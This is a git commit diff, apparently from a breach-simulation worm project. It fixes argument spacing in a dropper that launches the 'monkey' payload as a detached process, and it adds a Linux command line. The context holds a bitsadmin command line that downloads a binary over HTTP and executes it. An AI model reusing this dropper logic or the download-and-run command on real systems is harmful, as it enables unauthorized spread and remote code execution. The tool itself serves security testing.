minor fix in dropper

This commit is contained in:
Itay Mizeretz 2017-08-28 09:41:27 +03:00
parent 6f74a5e6cc
commit 332a11b272
2 changed files with 12 additions and 7 deletions

View File

@ -10,6 +10,7 @@ import argparse
from ctypes import c_char_p from ctypes import c_char_p
from model import MONKEY_CMDLINE from model import MONKEY_CMDLINE
from config import WormConfiguration from config import WormConfiguration
from system_info import SystemInfoCollector, OperatingSystem
if "win32" == sys.platform: if "win32" == sys.platform:
from win32process import DETACHED_PROCESS from win32process import DETACHED_PROCESS
@ -92,19 +93,21 @@ class MonkeyDrops(object):
except: except:
LOG.warn("Cannot set reference date to destination file") LOG.warn("Cannot set reference date to destination file")
monkey_cmdline = MONKEY_CMDLINE % {'monkey_path': self._config['destination_path'], if OperatingSystem.Windows == SystemInfoCollector.get_os():
} monkey_cmdline = MONKEY_CMDLINE % {'monkey_path': self._config['destination_path']}
else:
monkey_cmdline = MONKEY_CMDLINE % {'monkey_path': self._config['destination_path']}
if self.opts.parent: if self.opts.parent:
monkey_cmdline += "-p %s" % self.opts.parent monkey_cmdline += " -p %s" % self.opts.parent
if self.opts.tunnel: if self.opts.tunnel:
monkey_cmdline += "-t %s" % self.opts.tunnel monkey_cmdline += " -t %s" % self.opts.tunnel
if self.opts.server: if self.opts.server:
monkey_cmdline += "-s %s" % self.opts.server monkey_cmdline += " -s %s" % self.opts.server
if self.opts.depth: if self.opts.depth:
monkey_cmdline += "-d %s" % self.opts.depth monkey_cmdline += " -d %s" % self.opts.depth
monkey_process = subprocess.Popen(monkey_cmdline, shell=True, monkey_process = subprocess.Popen(monkey_cmdline, shell=True,
stdin=None, stdout=None, stderr=None, stdin=None, stdout=None, stderr=None,
close_fds=True, creationflags=DETACHED_PROCESS) close_fds=True, creationflags=DETACHED_PROCESS)

View File

@ -5,7 +5,9 @@ __author__ = 'itamar'
MONKEY_ARG = "m0nk3y" MONKEY_ARG = "m0nk3y"
DROPPER_ARG = "dr0pp3r" DROPPER_ARG = "dr0pp3r"
DROPPER_CMDLINE = 'cmd /c %%(dropper_path)s %s' % (DROPPER_ARG, ) DROPPER_CMDLINE = 'cmd /c %%(dropper_path)s %s' % (DROPPER_ARG, )
# TODO: rename to WINDOWS/LINUX appropriately
MONKEY_CMDLINE = 'cmd /c %%(monkey_path)s %s' % (MONKEY_ARG, ) MONKEY_CMDLINE = 'cmd /c %%(monkey_path)s %s' % (MONKEY_ARG, )
MONKEY_CMDLINE_LINUX = './%%(monkey_path)s %s' % (MONKEY_ARG, )
DROPPER_CMDLINE_DETACHED = 'cmd /c start cmd /c %%(dropper_path)s %s' % (DROPPER_ARG, ) DROPPER_CMDLINE_DETACHED = 'cmd /c start cmd /c %%(dropper_path)s %s' % (DROPPER_ARG, )
MONKEY_CMDLINE_DETACHED = 'cmd /c start cmd /c %%(monkey_path)s %s' % (MONKEY_ARG, ) MONKEY_CMDLINE_DETACHED = 'cmd /c start cmd /c %%(monkey_path)s %s' % (MONKEY_ARG, )
MONKEY_CMDLINE_HTTP = 'cmd.exe /c "bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&cmd /c %%(monkey_path)s %s"' % (MONKEY_ARG, ) MONKEY_CMDLINE_HTTP = 'cmd.exe /c "bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&cmd /c %%(monkey_path)s %s"' % (MONKEY_ARG, )